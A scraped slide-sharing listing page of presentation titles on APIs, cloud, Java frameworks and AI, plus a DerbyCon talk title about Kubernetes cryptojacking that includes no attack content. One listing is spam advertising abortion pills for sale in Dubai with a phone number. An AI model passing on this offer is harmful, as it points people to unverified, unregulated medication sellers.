Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKJago de Vreede
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistandanishmna97
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Orbitshub
 
AI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by AnitarajAI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by AnitarajAnitaRaj43
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxRustici Software
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdfSandro Moreira
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...apidays
 

Kürzlich hochgeladen (20)

Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering Developers
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
 
AI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by AnitarajAI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by Anitaraj
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
 

DerbyCon 2019: Prepare to be Boarded! A Tale of Kubernetes, Plunder, and Cryptobooty